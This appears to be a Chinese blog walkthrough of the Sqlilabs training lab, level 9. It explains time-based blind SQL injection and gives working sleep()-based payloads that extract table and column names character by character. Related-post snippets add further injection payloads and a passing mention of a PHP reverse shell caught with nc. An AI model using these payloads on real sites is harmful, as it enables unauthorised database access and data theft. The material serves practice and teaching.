Sqlilabs-9

原創 CrAcKeR-1 2020-07-07 19:34

第九關是基於時間的盲注,所以這裏放過程圖片沒啥卵用了,直接上payload
7fc4f89e9470c1fd919fda9f78296ff.png
思路大致如下:
count(*)得到表個數 --> 各個表長度 --> 猜測表名
count(*)得到列個數 --> 各個列長度 --> 猜測列名
得到數據的思路同上↑

這裏提供幾個正確的 payload :

得到第一張表的第一個字母:
http://sqlilabs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1))=101,sleep(5),0)--+

得到users表列的第一個字母:
http://sqlilabs/Less-9/?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema = database() and table_name = 'users' limit 0,1),1,1))=105,sleep(5),0)--+

也可以像第 8 關那樣編寫腳本,思路一樣的,只不過需要更換 payload 而已

73ac3d6a9e4c32872061604a675e287.png

😄

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

Sqlilabs-4

http://sqlilabs/Less-4/?id=1 回顯正常 http://sqlilabs/Less-4/?id=1' 回顯正常 http://sqlilabs/Less-4/?id=1" 回顯報錯 報

CrAcKeR-1 2020-07-07 19:34:59

Sqlilabs-15

這一關來到了第 15 關,值得注意的是,這一關是布爾和時間盲注的結合關,很好玩哦~ 因爲有時間盲注,這裏就直接上菜了,下面是幾個例子 –查表 uname=admin' and if(ascii(substr((select gr

CrAcKeR-1 2020-07-07 19:34:59

Sqlilabs-5

這一節引入了新的概念:雙查詢 其利用的原理就是:有研究人員發現,當聚合函數和分組函數,隨機函數,取整函數聯合使用時會報錯,其報錯內容會將查詢的內容顯示出來。第五關就是基於這個原理。 在這裏先講述幾個概念: 雙查詢:顧名思義就是包

CrAcKeR-1 2020-07-07 19:34:59

Sqlilabs-16

相較於第 15 關,單引號變成了雙引號 + 括號 –查列 uname=admin") and if(ascii(substr((select group_concat(table_name) from information_s

CrAcKeR-1 2020-07-07 19:34:59

Sqlilabs-7

題目說是上傳文件,可以上傳一個 php 反彈 shell,kali 開啓 nc 連上就 OK http://sqlilabs/Less-7/?id=1' 回顯報錯 http://sqlilabs/

CrAcKeR-1 2020-07-07 19:34:59

Sqlilabs-11

從第 11 關開始我們進入了 POST 環節,什麼是 POST ,POST 就是數據從客戶端提交到服務端,例如在這個關卡中,我們就是將用戶名和密碼以表單的形式提交給服務器,然後服務器再進行驗證。 如圖,在 Hackbar 我們

CrAcKeR-1 2020-07-07 19:34:59

Sqlilabs-10

第 10 關是也基於時間的盲注,跟第 9 關一樣,只不過單引號 ’ 變成了雙引號 " 而已 思路大致如下: count(*)得到表個數 --> 各個表長度 --> 猜測表名 count(*)得到列個數 --> 各個列長度 -->

CrAcKeR-1 2020-07-07 19:34:59

Sqlilabs-14

這裏來到了第 14 關,題目是個忽悠,說是單引號+括號,整的跟 13 關一樣但其實就是個大忽悠 在 Hackbar 上做注入,這一關 hackbar 又可以用了…這是屬於哪波操作? uname=admin'&passwd=111

CrAcKeR-1 2020-07-07 19:34:59

Sqlilabs-6

第 6 關跟第 5 關一樣,只不過是單引號換成了雙引號而已 構造 ID 後,顯示的內容爲:You are in… http://sqlilabs/Less-6/?id=1 回顯正常 http://sqlilabs

CrAcKeR-1 2020-07-07 19:34:59

Sqlilabs-13

還記得第 5 關跟第 6 關的雙查詢注入嗎?(其實本質就是盲注),有了 5 6 關卡的基礎,再來玩 13 關就很輕鬆了… 不過這裏倒是有小小的疑惑…就是 hackbar 在這關沒有效果,必須得在方框內輸入纔可以…payload 我

CrAcKeR-1 2020-07-07 19:34:59

Sqlilabs-12

這裏到了 12 關,是 11 關的練習版本,只不過是把單引號換成了 雙引號 + 括號,其餘的都是一樣的。 這裏仍然以 hackbar 爲例構造 payload: uname=admin") order by 3#&passwd=

CrAcKeR-1 2020-07-07 19:34:59

Sqlilabs-17

來到了 17 關,從這關開始剛學習需要藉助源碼來配合學習,本關學習內容是 update 內容 從源碼中可以看到,開發者的意圖流程是: 首先查詢用戶名相匹配的 users 表中 數據,所以這裏如果需要注入首先得有一個在數據庫中已

CrAcKeR-1 2020-07-07 19:34:59

Sqlilabs-4

http://sqlilabs/Less-4/?id=1 回顯正常 http://sqlilabs/Less-4/?id=1' 回顯正常 http://sqlilabs/Less-4/?id=1" 回顯報錯 報

CrAcKeR-1 2020-07-07 19:34:59

Sqlilabs-15

這一關來到了第 15 關,值得注意的是,這一關是布爾和時間盲注的結合關,很好玩哦~ 因爲有時間盲注,這裏就直接上菜了,下面是幾個例子 –查表 uname=admin' and if(ascii(substr((select gr

CrAcKeR-1 2020-07-07 19:34:59

Sqlilabs-5

這一節引入了新的概念:雙查詢 其利用的原理就是:有研究人員發現,當聚合函數和分組函數,隨機函數,取整函數聯合使用時會報錯,其報錯內容會將查詢的內容顯示出來。第五關就是基於這個原理。 在這裏先講述幾個概念: 雙查詢:顧名思義就是包

CrAcKeR-1 2020-07-07 19:34:59